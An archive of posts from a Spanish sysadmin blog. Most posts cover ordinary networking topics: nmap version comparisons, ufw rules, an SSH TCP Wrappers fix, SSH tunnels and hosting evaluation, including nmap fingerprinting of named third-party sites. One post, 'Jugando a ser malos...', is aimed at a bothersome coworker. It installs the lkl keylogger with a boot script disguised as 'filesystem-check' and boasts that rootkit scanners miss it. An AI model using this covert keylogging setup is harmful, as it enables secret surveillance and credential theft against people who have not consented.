Mostrando entradas con la etiqueta networking. Mostrar todas las entradas
Mostrando entradas con la etiqueta networking. Mostrar todas las entradas

martes, 9 de marzo de 2010

mumble

Leyendo un post en groups.drupal.org via @pcambra buceo por los foros de Drupal. No sé que buscaba ni la motivación para hacerlo. Muchas veces "surfeo" sin buscar nada en especial, disfruto pensando cómo han diseñado la web, si usan CSS, sin es un CMS; otras sin embargo, si veo algo extraño arranco NMAP...no sé si esto es "deformación profesional", lo que si es cierto es que he invertido muchas horas de mi vida en este pasatiempo.
Un hilo me ha llamado la atención. Quedán para charlar con mumble, una aplicación de VoIP de código abierto(Licencia BSD / GPL ). Si algún gamer lee este post, el "símil" propietario podría ser TeamSpeak. Me ha llamado la atención que desde la versión 1.1 toda la comunicación se cifra con TLS; además mumble es multiplataforma(algo que suelo valorar mucho!), y se caracteriza por:
  • Seguridad: TLS
  • Jerarquia de canales
  • Calidad de sonido
  • Baja latencia
  • Plugins.
Intentaré probarlo en breve y comentar las impresiones.
Saludos.

miércoles, 16 de diciembre de 2009

Comprobar conectividad UDP

Como estos días tengo bastante tiempo libre, he dedicado parte de este a hacer cosas que casi nunca hago, entre ellas configurar un servidor de Urban Terror. El servicio usa el motor del mítico QuakeIII, y escucha peticiones de conexión por el protocolo UDP en el puerto número 27960. Para comprobar si tenemos conectividad UDP, basta con instalar nmap y ejecutar:
pilarubio:/home/apermuy# nmap -p 27960 -sU -P0 11.22.33.44
El resultado sería:
Starting Nmap 4.62 ( http://nmap.org ) at 2009-12-16 23:08 CET
Interesting ports on ejemplo.permuy.org (11.22.33.44):
PORT STATE SERVICE
27960/udp open|filtered quake3
Saludos

jueves, 5 de noviembre de 2009

gufw: Uncomplicated firewall


Los que llevan(llevamos) algún tiempo usando GNU/Linux seguro nos hemos visto en la tesitura de configurar un firewall. Iptables, sólo con nombrarlo, a veces asusta. Debes tener unos conocimientos sólidos del protocolo TCP/IP así como unas buenas nociones sobre redes y enrutamiento.

No recuerdo bien si lo he leído en alguna web o blog, o simplemente "jugando" con synaptic. Ubuntu desde la versión 8.04, incorporá una implementación de iptables "sencilla" para consola, llamada ufw(uncomplicated firewall). En lugar de las kilométricas cadenas de iptables, las acorta, facilitando así la administración de la máquina en cuestión. Hablamos, por supuesto, de máquinas de escritorio; desconozco aún si existe versión para servidores, aunque para esto tenemos fwbuilder , claro.

[root@patriciaconde] ufw allow http

En este ejemplo habilitaríamos todo el tráfico http.

[root@patriciaconde] ufw allow from 192.168.10.0/24 proto tcp to any port http

En este ejemplo se permite el tráfico desde(from) la red 192.168.10.0/255.255.255.0 por el protocolo http(tcp 80).

Con gufw nos olvidamos(sólo por un momento) de la consola y podremos "disfrutar" de una versión GTK(lo siento KDE users) muy sencilla. Más información en la web del proyecto.

miércoles, 19 de agosto de 2009

Nmap 5.0, actualízate si puedes.

No es la primera vez en este blog que hablo sobre Nmap. En la oficina uso Ubuntu 9.04, he tenido que aparcar Debian Testing/Unstable por haber metido la pata mezclando repositorios y compilando y recompilando kernels. El caso es que necesitaba usar nmap para hacer "unas cosillas". Todo correcto; ya conocía este software desde hace muchos años. No sé por qué, me daba la impresión de que el tiempo de espera para los escaneos era demasiado. Comprobemos la versión instalada.

root@alberto:/# /usr/bin/nmap -V

Nmap version 4.76 ( http://nmap.org )

Ahora toca visitar la web de nmap[ http://insecure.org/nmap ] , para comprobar cual es la última versión. Efectivamente, han liberado la versión 5.0, que como es de esperar se puede descargar desde la propia web. Llegados a este punto, la pregunta es: ¿Debo instalar la versión 5.0? ¿Qué mejoras existen respecto a la versión 4.x? Nmap está muy bien documentado, y podéis ver más información acerca de la versión 5.0 aquí. Todo esto está muy bien, pero en la práctica...
He realizado unas pruebas muy sencillas para comprobar en persona, las diferencias en la versión 5.0 y 4.76-0ubuntu4, que básicamente han consistido en:
  • Descargar fuentes y compilar nmap 5.0
  • Escaneo gateway(nmap sin parámetros)
  • Escaneo Sistema Operativo del gateway (nmap -O)
  • Escaneo Sistema Operativo y version del software del gateway (nmap -A -T4)
Compilando nmap.
Muy sencillo. Los pasos son los siguientes:
  • Descargamos fuentes:

[root@alberto] wget http://nmap.org/dist/nmap-5.00.tar.bz2

  • Descomprimimos y desempaquetamos

[root@alberto] tar -xjpf nmap-5.00.tar.bz2

  • Compilamos e instalamos

[root@localhost]./configure && make && make install


Llegados a este punto, tenemos el binario de la version 5.00 en /usr/local/bin/nmap y el de la version 4.76 en /usr/bin/nmap.

root@alberto:/# /usr/bin/nmap -V

Nmap version 4.76 ( http://nmap.org )

root@alberto:/home/alberto# /usr/local/bin/nmap -V

Nmap version 5.00 ( http://nmap.org )


Ya podemos comenzar...

Escaneo gateway(nmap sin parámetros)

Resultados con la versión 4.76:

root@alberto:/# time /usr/bin/nmap -e eth0 100.100.100.100

Starting Nmap 4.76 ( http://nmap.org ) at 2009-08-19 13:37 CEST
Interesting ports on 100.100.100.100:
Not shown: 998 filtered ports
PORT STATE SERVICE
113/tcp closed auth
541/tcp open uucp-rlogin
MAC Address: 00:09:0F:37:F0:C6 (Fortinet)

Nmap done: 1 IP address (1 host up) scanned in 4.18 seconds

real 0m4.194s
user 0m0.236s
sys 0m0.036s

Resultados con la versión 5.00:
root@alberto:/# time nmap -e eth0 100.100.100.100

Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-19 13:36 CEST
Interesting ports on 100.100.100.100:
Not shown: 998 filtered ports
PORT STATE SERVICE
113/tcp closed auth
541/tcp open uucp-rlogin
MAC Address: 00:09:0F:37:F0:C6 (Fortinet)

Nmap done: 1 IP address (1 host up) scanned in 4.95 seconds

real 0m4.956s
user 0m0.224s
sys 0m0.032s

Llama la atención que la versión 5.00 ha tardado 0,77 segundos más que la 4.76. En principio la 4.76 se anotaría el primer punto. Personalmente creo que no, ya lo explicaré más adelante.Vemos que ha identificado bien el modelo del gateway y poco más podemos extraer(si buscarle los tres pies al gato, claro).

Escaneo Sistema Operativo del gateway (nmap -O)
Resultados con la versión 4.76:

root@alberto:/# time /usr/bin/nmap -e eth0 -O 100.100.100.100

Starting Nmap 4.76 ( http://nmap.org ) at 2009-08-19 13:38 CEST
Insufficient responses for TCP sequencing (2), OS detection may be less accurate
Interesting ports on 100.100.100.100:
Not shown: 998 filtered ports
PORT STATE SERVICE
113/tcp closed auth
541/tcp open uucp-rlogin
MAC Address: 00:09:0F:37:F0:C6 (Fortinet)
Aggressive OS guesses: Check Point ZoneAlarm Z100G firewall (88%), Actiontec GT701 DSL modem (87%), HP Brocade 4100 switch; or Actiontec MI-424-WR, Linksys WRVS4400N, or Netgear WNR834B wireless broadband router (87%), F5 BIG-IP Local Traffic Manager load balancer (87%), HP 4200 PSA (Print Server Appliance) model J4117A (87%), DD-WRT v23 (Linux 2.4.34) (87%), MontaVista Linux 2.4.17 (87%), Telkom Mega 100 WR DSL modem (Linux 2.4.17_mvl21-malta-mips_fp_le) (87%), FreeBSD 6.2-RELEASE (87%), OpenBSD 4.3 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds

real 0m8.979s
user 0m0.388s
sys 0m0.064s


Resultados con la versión 5.00

root@alberto:/# time /usr/local/bin/nmap -e eth0 -O 100.100.100.100

Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-19 13:38 CEST
Interesting ports on 100.100.100.100:
Not shown: 998 filtered ports
PORT STATE SERVICE
113/tcp closed auth
541/tcp open uucp-rlogin
MAC Address: 00:09:0F:37:F0:C6 (Fortinet)
Device type: firewall
Running: Fortinet embedded
OS details: Fortinet FortiGate-100A firewall
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds

real 0m6.319s
user 0m0.432s
sys 0m0.104s


Primer punto para la versión 5.00. En realidad, a mi modo de ver, este vale por dos. 2,66 segundos menos en detectar la versión del S.O! Aún encima la ha clavado:

OS details: Fortinet FortiGate-100A firewall

Esto no es mérito sólo de Fyodor(programador principal del proyecto), sino de la gente que se ha currado libpcap. Libpcap es una librería que capturar paquetes en redes de datos para plataformas tipo Unix(también en Sistemas Windows). La versión de esta librería en nmap 4.76 es la 0.8:

root@alberto:/tmp# ldd /usr/bin/nmap
linux-gate.so.1 => (0xb80dd000)
libpcre.so.3 => /lib/libpcre.so.3 (0xb8097000)
libpcap.so.0.8 => /usr/lib/libpcap.so.0.8 (0xb8066000)
libssl.so.0.9.8 => /lib/i686/cmov/libssl.so.0.9.8 (0xb801e000)
libcrypto.so.0.9.8 => /lib/i686/cmov/libcrypto.so.0.9.8 (0xb7ed2000)
libdl.so.2 => /lib/tls/i686/cmov/libdl.so.2 (0xb7ece000)
libstdc++.so.6 => /usr/lib/libstdc++.so.6 (0xb7ddf000)
libm.so.6 => /lib/tls/i686/cmov/libm.so.6 (0xb7db9000)
libgcc_s.so.1 => /lib/libgcc_s.so.1 (0xb7da9000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7c46000)
libz.so.1 => /lib/libz.so.1 (0xb7c30000)
/lib/ld-linux.so.2 (0xb80de000)

, mientras que en la versión de nmap 5.00 es la 0.97:

root@alberto:/media/bodega/misc/nmap-5.00/libpcap# cat CHANGES |head
@(#) $Header: /tcpdump/master/libpcap/CHANGES,v 1.59.2.11 2007/07/24 02:27:32 mcr Exp $ (LBL)

Wed. July 23, 2007. mcr@xelerance.com. Summary for 0.9.7 libpcap release
(...)

Es de suponer que las mejoras, a parte de los bug-fix, son considerables. Enhorabuena a la gente de TCPDUMP.

Escaneo S.O y versión del software del gateway (nmap -A -T4)
Resultados con la versión 4.76:

root@alberto:/# time /usr/bin/nmap -e eth0 -sP 100.100.100.0/24

Starting Nmap 4.76 ( http://nmap.org ) at 2009-08-19 13:43 CEST
Host 100.100.100.5 appears to be up.
MAC Address: 00:09:0F:37:F0:C6 (Fortinet)
Host 100.100.100.12 appears to be up.
MAC Address: 00:50:56:A9:4D:AB (VMWare)
Host 100.100.100.19 appears to be up.
MAC Address: 00:0B:CD:1B:85:4D (Sun)
Host 100.100.100.61 appears to be up.
MAC Address: 00:50:AA:20:61:83 (Konica Minolta Holdings)
Host 100.100.100.64 appears to be up.
MAC Address: 00:00:74:93:DA:76 (Ricoh Company)
Host 100.100.100.118 appears to be up.
MAC Address: 00:33:64:B9:8A:C8 (Sun)
Host 100.100.100.153 appears to be up.
MAC Address: 00:50:56:A9:59:98 (VMWare)
Host 100.100.100.202 appears to be up.
MAC Address: 00:33:64:B9:9A:E9 (Unknow)
Host 100.100.100.204 appears to be up.
MAC Address: 00:33:64:B9:96:96 (Unknow)
Host 100.100.100.212 appears to be up.
MAC Address: 00:33:64:B9:94:1A (Unknow)
Host 100.100.100.214 appears to be up.
MAC Address: 00:33:64:B9:9A:E8 (Unknow)
Host 100.100.100.225 appears to be up.
MAC Address: 00:33:64:B9:91:91 (Unknow)
Host 100.100.100.239 appears to be up.
MAC Address: 00:50:56:A9:1A:B8 (VMWare)
Nmap done: 256 IP addresses (13 hosts up) scanned in 12.07 seconds

real 0m12.087s
user 0m0.212s
sys 0m0.016s

Resultados versión 5.00:

root@alberto:/# time /usr/local/bin/nmap -e eth0 -sP 100.100.100.0/24

Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-19 13:43 CEST
Host 100.100.100.5 is up (0.00033s latency).
MAC Address: 00:09:0F:37:F0:C6 (Fortinet)
Host 100.100.100.12 is up (0.00054s latency).
MAC Address: 00:50:56:A9:4D:AB (VMWare)
Host 100.100.100.19 is up (0.00023s latency).
MAC Address: 00:0B:CD:1B:85:4D (Hewlett Packard)
Host 100.100.100.61 is up (0.0090s latency).
MAC Address: 00:50:AA:20:61:83 (Konica Minolta Holdings)
Host 100.100.100.64 is up (0.00041s latency).
MAC Address: 00:00:74:93:DA:76 (Ricoh Company)
Host 100.100.100.118 is up (0.00022s latency).
MAC Address: 00:33:64:B9:8A:C8 (Hewlett Packard)
Host 100.100.100.153 is up (0.00056s latency).
MAC Address: 00:50:56:A9:59:98 (VMWare)
Host 100.100.100.202 is up (0.00028s latency).
MAC Address: 00:33:64:B9:9A:E9 (Hewlett Packard)
Host 100.100.100.204 is up (0.00023s latency).
MAC Address: 00:33:64:B9:96:96 (Hewlett Packard)
Host 100.100.100.212 is up (0.00018s latency).
MAC Address: 00:33:64:B9:94:1A (Hewlett Packard)
Host 100.100.100.214 is up (0.00017s latency).
MAC Address: 00:33:64:B9:9A:E8 (Hewlett Packard)
Host 100.100.100.225 is up (0.00025s latency).
MAC Address: 00:33:64:B9:91:91 (Hewlett Packard)
Host 100.100.100.239 is up (0.0097s latency).
MAC Address: 00:50:56:A9:1A:B8 (VMWare)
Nmap done: 256 IP addresses (13 hosts up) scanned in 12.40 seconds

real 0m12.401s
user 0m0.140s
sys 0m0.008s


Apenas 0,37 segundos más a tardado la versión 5.00 en realizar el escaneo. Sí ha dado en el clavo.La mayoría de las máquinas son HP, y no Unknow con no "dice" la versión 4.76.

Resumiendo, me quedo con la versión 5.00. Usar repositorios, a veces, es lo que tiene, puedes seguir con una versión obsoleta de un software, que aparentemente funciona bien, tiempo y tiempo. Todos(o casi todos) sabemos, conocemos o hemos oído hablar de las ramas experimentales en Debian; pero nunca tendremos software "tan fresco" como si lo descargamos y compilamos de la web de los desarrolladores. Bondades y maldades del software libre.

martes, 7 de julio de 2009

Jugando a ser malos...

Tengo medio abandonado el blog(falta de tiempo y mucho trabajo), pero bueno, hoy voy a dejar una perla, dedicada especialmente a un personaje que últimamente no para de molestarme, en lugar de hacer su trabajo; pues ahora, amigo mío, te presento a lkl, un keylogger para máquinas GNU/Linux.
Un keylogger es un "registrador" de teclas, es decir, guarda en un fichero todo que "tecleamos".
Para "jugar" con lkl, basta un simple apt-get:

[root@localhost]: apt-get install lkl
[root@localhost]: lkl -h
-- Linux Key Logger vers 0.1.1 --
usage:
-h this help
-l start to log the 0x60 port (keyboard)
-b Debug Mode.Perhaps it's usefoul :P
-k set a keymap file
-o set an output file
-m send logs to every 1k
-t hostname for sendmail server. default is localhost

Example: lkl -l -k keymaps/it_km -o log.file


Poco que explicar de la ayuda: simple y concisa. Por cierto, me flipa que tenga la posibilidad de enviar el log por email cada 1k, aunque pensándolo bien, es un poco cantoso...
El caso es que si queréis que lkl se inicie cada vez que se inicia el sistema, creamos un fichero en /etc/init.d/ , con el nombre(es lo de menos), por ejemplo filesystem-check, con el siguiente contenido:

#!/bin/bash
#
#
FICHERO_LOG=/root/log_keys.txt
mv $FICHERO_LOG $FICHERO_LOG.$$
touch $FICHERO_LOG
case "$1" in
start)
/usr/bin/lkl -l -k /usr/share/lkl/keymaps/us_km -o $FICHERO_LOG &
;;
stop)
pkill lkl
;;
*)
echo "Usa: /etc/init.d/lkl {start|stop}"
exit 1
;;
esac
exit 0

Ahora necesitamos que se ejecute al incio.

[root@localhost] update-rc.d filesystem-check
defaults

He probado con rkhunter y chkrootkit y no ha cantado nada. En fin , será cuestión de mejorar la implementación. De momento, sé de uno que se ha quedado sin...

miércoles, 24 de junio de 2009

ssh_exchange_identification

Ayer por la tarde, configurando vsftpd en una máquina con Debian GNU/Linux añadí una interfaz de red a mayores. En principio todo parecía funcionar sin problemas. Probe la conectividad desde el segmento de red vía ICMP, pedí vía HTTP un documento al servidor web de esta misma máquina y todo parecía funcionar. La sorpresa es cuando, al llegar a casa ,intento conectarme vía SSH. Misión imposible, devuelve el error: ssh_exchange_identification. La solución fue muy sencilla :

echo 'SSHD: ALL' >> /etc/hosts.allow

Pero mi pregunta es la siguiente: ¿ por qué ? Esto es lo que odio muchas veces de los foros de Internet. La gente resuelve un problema despreocupándose del porqué, algo que a mi modo de ver es tanto o más importante que el propio problema en sí. Saber el origen ayuda a no volver a cometer el mismo error en un futuro. Pues manos a la obra. Vamos a intentar averiguar el por qué del ssh_exchange_identification.
Leo en este post, que OpenSSH usa TCPWrappers, escrito por el maestro Wietse Venema , os suena de algo. Postfix quizá? TCPWrappers es un sistema de Listas de Control de Acceso(ACL) para servicios de la pila de protocolos TCP/IP. Incluye una librería libwrap que incluye las principales funcionalidades de filtrado. Intuyo que al detectar que se ha añadido una nueva interfaz, la acción por defecto es denegar el acceso a SSH; y puesto que TCPWrapper usa /etc/hosts.allow y /etc/hosts.deny para definir qué servicios "envuelve",la explicación ahora, a mi modo de ver, queda un poco más clara, verdad?

Comprobamos si efectivamente OpenSSH está compilado con libwrap:

root@pilarrubio#ldd /usr/sbin/sshd
linux-gate.so.1 => (0xffffe000)
libwrap.so.0 => /lib/libwrap.so.0 (0xb7f3c000)
libpam.so.0 => /lib/libpam.so.0 (0xb7f31000)
libdl.so.2 => /lib/i686/cmov/libdl.so.2 (0xb7f2c000)
libselinux.so.1 => /lib/libselinux.so.1 (0xb7f12000)
libresolv.so.2 => /lib/i686/cmov/libresolv.so.2 (0xb7efc000)
libcrypto.so.0.9.8 => /usr/lib/i686/cmov/libcrypto.so.0.9.8 (0xb7da4000)
(...)

jueves, 18 de junio de 2009

Ocultando, viendo y luchando contra...

Después de más de dos semanas sin postear absolutamente nada, no por falta de ganas, más bien por falta de tiempo. Como comentaba, entre el trabajo,los cursos y la futura asociación y demás actividades, es difícil mantener la actividad del blog. Pero vamos a ello. Cosas interesantes que he visto vía RSS y demás.

Ver cabeceras HTTP en la línea de comandos.

alberto@debian:/tmp$ wget -S www.google.com -O /dev/null
--2009-06-18 05:58:49-- http://www.google.com/
Resolviendo www.google.com... 209.85.135.106, 209.85.135.147, 209.85.135.99, ...
Connecting to www.google.com|209.85.135.106|:80... conectado.
Petición HTTP enviada, esperando respuesta...
HTTP/1.0 302 Found
Location: http://www.google.es/
Cache-Control: private
Content-Type: text/html; charset=UTF-8

Ocultar versión PHP.
Buscamos la el fichero php.ini, en mi caso, en Debian GNU/Linux con apache2 y php5, el fichero en cuestión se localiza en /etc/php5/apache2/php.ini, como comentar Nasser Heidari "Haciendo esto, no harás tu servidor Web más seguro, solo harás que a los hosts remotos les sea un poco más difícil ver qué versión de PHP tienes corriendo en tu sistema".

expose_php = Off

Por cierto, estas tres referencias las he leído en el blog de Nasser. Os recomiendo una entrada reciente , en la que comenta cómo evitar en Apache2 ataques de BruteForce y DoS.
Crear un fichero "ficticio" , en este caso de 10M.
Este es "cojonudo" cuando en una LAN party, en un Server Direct Connect , ponen restricciones del tipo "Mínimo 30GB para poder acceder al servidor", pues toma GB...

dd if=/dev/zero of=testfile.txt bs=1M count=10

Añadir timestamp a mysqldump.

$ mysqldump [options] |gzip ->mysqldump-$(date +%Y-%m-%d-%H.%M.%S).gz


De momento esto es todo.

martes, 2 de junio de 2009

Aceptamos FTP como protocolo inseguro.


Wireshark a calado en los SysAdmins, de eso no hay duda; lo triste de esta historia es que muchos desconocen Ethereal. Pero bueno, muchas veces se lleva la gloria el programador de la GUI en lugar del que se lo ha currado de verdad, sin quitar mérito al primero claro.
Hace unos minutos jugaba con Wireshark para ver qué datos pillaba de una web que estoy programando, y he recordado lo inseguro que es FTP. En su lugar, usa scp,ssh o sshfs.
Fijaos bien en esta captura de pantalla repetid conmigo en voz alta: "Sí, aceptamos FTP, al igual que Windows XP , como protocolo inseguro".

jueves, 23 de abril de 2009

Rendimiento de un proveedor de Hosting.

Al hilo de un twitt de un coleguilla, me pregunta, aún no sé muy bien el porqué, acerca de cómo "medir" el rendimiento de un proveedor de Hosting. La verdad es que la pregunta es muy interesante. Nunca me lo había preguntado directamente; pero intentaré responder de un modo coherente. Realmente la respuesta es compleja, ya que un "hosting" puede alojar multitud de servicios: web,correo,ftp,cvs...etc.Empecemos por la cuestiones generales:


Cuestiones Generales, me fijaría principalmente en :

  • Calidad de las respuestas y tiempo en responder ante duda antes de la "compra".
  • Calidad del proceso de registro/compra.[Amigable/Complejo]
  • Notificaciones acerca actualizaciones
  • Periodo de prueba gratuito[Si/No]
  • Calidad de la documentación y manuales.
  • Calidad y tiempo de respuesta antes cuestiones técnicas.
  • Formas de contacto: mail,telefono,skype...etc.
  • Precio/Calidad

Cuestiones Técnicas

  • ¿Tienen acuerdo con Puntos Neutros?. Gran ventaja en relación a la calidad del servicio. Si tienen acuerdos con puntos neutros, "nuestros paquetes" no viajarán por toda la red, y serán "cacheados" en puntos de intercambio de redes.
  • ¿Cuantos servidores o cuál es su estructura DNS?. No sé bien cómo explicar este punto sin liarme.Casi mejor con un ejemplo. Hagamos una consulta con dig a as.com, y después otra a google.com. Como vemos, google.com, como era de esperar "tiene" más sevidores DNS que "almacenan" la BBDD con los registros A,MX...etc del dominio. Personalmente, me da más seguridad que otro dominio que sólo tiene dos, o como burradas que he visto últimamente, dominios que sólo disponen de un DNS; con lo cual, cae el server, y...

[root@patriciaconde]dig as.com
;; AUTHORITY SECTION:
as.com. 25890 IN NS dns1.ibercom.com.
as.com. 25890 IN NS dns2.ibercom.com.
[root@patriciaconde]dig google.com
;; AUTHORITY SECTION:
google.com. 284739 IN NS ns4.google.com.
google.com. 284739 IN NS ns3.google.com.
google.com. 284739 IN NS ns2.google.com.
google.com. 284739 IN NS ns1.google.com.



  • ¿Dónde se localiza el/los DataCenter/s? Haría un pequeño análisis y/o aproximación acerca la procedencia de los visitantes de la web. Por ejemplo, si la web está escrita en Portugués, lo más normal es que lo visitante procedan de Portugal o Brasil, pero claro, tratándose de Internet, ya se sabe. Personalmente me he topado con el "inconveniente" de terner un VPS en US cuando lo usuarios potenciales visitan el site dede Europa. En fin, la ignorancia tiene estas cosas. En Debian GNU/Linux tenemos el paquete geoip-bin, que no "dice" el pais al que pertenece la IP de nuestro servidor.

[root@patriciaconde]apt-get update && apt-get install geoip-bin
[root@patriciaconde]geiplookup permuy.org
GeoIP Country Edition: ES, Spain
[root@patriciaconde]geiplookup www.permuy.org
GeoIP Country Edition: US, United States

  • Latencia y rendimiento de red : Cómo de lejos está nuestro server/servers. Ping, traceroute, dig +trace,smokeping, incluso herramientas de monitorización "free" como mon.itor.us pueden ayudarnos a tomar decisiones técnicas finales acerca del proveedor de Hosting.
  • Sistema Operativo: Sin comentarios. GNU/Linux o FreeBSD en su defecto. Si no tiene acceso por SSH no me vale! Juas!
  • ¿ Son Geeks ?. Es algo que valoro, a veces en exceso. Rodearse de Unix/Linux Geeks tiene cosas positivas, por ejemplo, si aburres con tus conversaciones, siempre puedes hacer un apt-get update e instalar una versión nueva de la conversación....se me va la pinza. Retomando, si realmente son geeks y buenos, algo que deberían hacer es compilar su software. Por ejemplo, el fingerprint del webserver. A mucha gente no le dice nada, a mi , muchísimo. Quiere decir que se han preocupado por optimizar sus máquinas, y probablemente también dedicasen tiempo a elegir que software van a instalar. Pero, como casi todo en esta vida, mejor con un ejemplo. El señor Permuy, no se ha preocupado en compilar su Apache y ahora, en lugar de Debian GNU/Linux tiene que usar Ubuntu en su webserver por X motivos. El Sr.Kutus tiene su server detrás de un Firewall, probablemente IPCOP o alguna solución empotrada. Mientras que el Sr.Ferrolmoda.com aloja sus webs en un DinaHTTPD Server de Dinahosting. Veamos.

[root@patriciaconde]nmap -A www.comunidadeozulo.org -p 80
(...)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.9 ((Ubuntu) PHP/5.2.6-1+lenny2 with Suhosin-Patch)
-------------------------------------------------------------
[root@patriciaconde]nmap -A www.kutus.es -p 80
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: firewall|telecom-misc|WAP|general purpose|server appliance
Running (JUST GUESSING) : IPCop Linux 2.4.X (89%), Avaya Linux 2.6.X (88%), FON Linux 2.4.X|2.6.X (87%), Linksys Linux 2.6.X (86%), Netgear Linux 2.6.X (86%), Linux 2.6.X (85%), Toshiba Linux 2.4.X (85%)
--------------------------------------------------------------
[root@patriciaconde]nmap -A www.ferrolmoda.com -p 80
Interesting ports on hl58.dinaserver.com (82.98.134.13):
PORT STATE SERVICE VERSION
80/tcp open http?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port80-TCP:V=4.62%I=7%D=4/23%Time=49F0A3A7%P=i686-pc-linux-gnu%r(GetReq
SF:uest,239,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x2023\x20Apr\x202009\
SF:x2017:23:14\x20GMT\r\nServer:\x20DinaHTTPd\x20Server\r\nLast-Modified:\
SF:x20Mon,\x2024\x20May\x202004\x2016:25:22\x20GMT\r\nETag:\x20\"b475-147-


Espero que este post sea útil, seguro que existen un montón de errores y deficiencias técnicas, pero me he divertido mucho escribiéndolo.


jueves, 12 de marzo de 2009

Túneles con OpenSSH



Poco o nada más que añadir sobre OpenSSH.Aún hay gente que usa Telnet? Lo cierto que apenas he usado telnet durante estos 10 años.Recuerdo que la primera vez que usé un SS.OO Linux fue una Red Hat 5.2 vía Telnet, en 1999, si no recuerdo mal. Años después, durante la preparación para el CCNA, me sorprendió muchísimo que, en lugar de SSH, Cisco aún usase Telnet para acceder remotamente a los routers. Ahora creo que han actualizado el Currículum, y ya "enseñan" SSH. Mientras escribo recuerdo y añoro los tiempos en lo que configuraba los primeros(para mí) router 3COM 812 y los SpeedStream, os acordáis?...Aquellas ADSLs con IP WAN 217.xxx.xxx.xxx, qué tiempos...supongo que todo esto es consuencia del paso de los años.
Todo esto viene a cuento de que me he creado una cuenta en delicious, y durante la mañana de ayer, mientras revisaba y ordenadaba unos cuantos marcadores, personales y para el proyecto de repositorios en el que trabajo, he encontrado algún link olvidado sobre el "tunnenling con SSH". Me pareció un tema muy interesante, sobre todo, para no estar todo el día modificando la tabla NAT del router; y evidentemente por la flexibilidad que ofrece. Ahora, con ganas de guerra, me pregunto..."Señores de Micro$oft.¿Qué herramienta similar a OpenSSH ofrecen en sus SSOO propietarios y corporativos?".Hace unos cuantos años, que estoy totalmente desconectado del tema Micro$oft en general y Window$, pero aún no me ha llegado ningún RSS, email, twitt o similar que responda a esta pregunta.En fin, que lo que mal empieza(Microsoft Windows), mal acaba(Microsoft Windows Vi$ta, por ejemplo). De MacOSX no comentaré nada, pues, a pesar de que creo que están en el juzgado por decir que es un SSOO tipo UNIX, decir que tanto OpenSSH como OpenSSL ya están implementado en el SSOO.

Un pequeño ejemplo de cómo acceder al puerto 80 de una máquina dentro de la LAN que está detrás de ext.dominio.org. Por cierto, para puertos entre el rango 1-1024, son necesarios privilegios de root.


[root@localhost]ssh -CNvL 8081:192.168.1.1:80 user@ext.dominio.org


C: Comprime.
N: No permite ejecutar comandos en la máquina remota, sólo permite port forwarding.
v: Modo verbose.
L: Puertos/IPs a ser forwardeadas.
Otro link interesante es este.

Para los más vagos he encontrado GSTM, Gnome Tunnel Manager, una aplicación para Gnome que permite manejar los túneles SSH de forma más cómoda, si tienes X claro, si no, lo veo complicado. [ Más info ]

Descargas:
Para OpenBSD : http://www.openssh.com/openbsd.html
Resto de Arquitecturas *NIX:http://www.openssh.com/portable.html

viernes, 27 de febrero de 2009

Huawei E180 en MacOSX y GNU/Linux

Desde hace aproximadamente un mes y medio tengo conexion HSPA con Movistar. La verdad que es casi no la he usado, pero cuando la necesite.... El día que estuve en la tienda de Movistar, muy amable por cierto la señorita, pero con todos mis respetos, ni puñetera idea. No necesitaba escuchar de nuevo lo "guays" que son en Telefónica, por que después de 7 años como cliente... El caso que la única pregunta que le hice fue ¿Funciona en MacOSX? La señorita me dice que si tengo un Mac. Conozco hacks para instalar MacOSX en PCs, pero... tampoco hay que ser un lumbreras para tan magna deducción! En fin, que no sabe que responder y me dice que ella también tiene uno(a mí que me importa, a todo esto) pero que sabe que en Windows Vista funciona muy bien ¿? Pero si Windows no funciona : hay virus, verdad? Pues entonces no funciona. Es muy sencillo. Me fui un poco decepcionado, pero lo dicho, tratándose de Telefónica. En GNU/Linux no hay problema para hacerlo funcionar. La gente de OpenMovilForum han hecho un gran trabajo para portar la aplicación. Funciona realmente bien y es estable. Aquí podéis descargarlo. Lo tengo instalado en un Debian GNU/Linux con Kernel 2.6.28.4 en rama testing sin problemas.Para Mac lo he tenido un poco complicado, más que nada por seguir los consejos de los foros de Huawei. Qué mejor que la web del fabricante para informarte, no es así? El caso que dicen que no tenía soporte para MacOSX...bla,bla,bla. Hoy he encontrado un post en el que se linkaba la URL de Telefónica para descargar el Escritorio Movistara para Mac OS X. Descargar, reiniciar y listo.